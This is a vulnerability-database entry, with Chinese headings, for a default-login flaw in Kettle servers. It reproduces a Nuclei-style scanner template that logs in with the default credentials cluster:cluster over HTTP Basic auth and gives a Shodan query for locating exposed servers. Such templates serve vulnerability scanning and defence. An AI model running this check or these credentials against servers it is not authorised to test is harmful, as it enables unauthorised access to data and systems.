漏洞描述
Kettle contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
kettle-default-login: Kettle - Default Login
PoC代码[已公开]
id: kettle-default-login
info:
name: Kettle - Default Login
author: For3stCo1d
severity: medium
description: Kettle contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
cvss-score: 5.8
cwe-id: CWE-522
metadata:
verified: true
max-request: 1
shodan-query: basic realm="Kettle"
tags: default-login,kettle,vuln
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{base64(username + ':' + password)}}
attack: pitchfork
payloads:
username:
- cluster
password:
- cluster
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Kettle slave server'
- type: status
status:
- 200
# digest: 4a0a0047304502202ed0858815557e534fefd53bf133406d71d248189841ecc2168b0b2c1d09c6040221008e23fe62f758fb48006b7198e4b344eda7166b12172f7913f63651d38d6ddac3:922c64590222798bb761d5b6d8e72950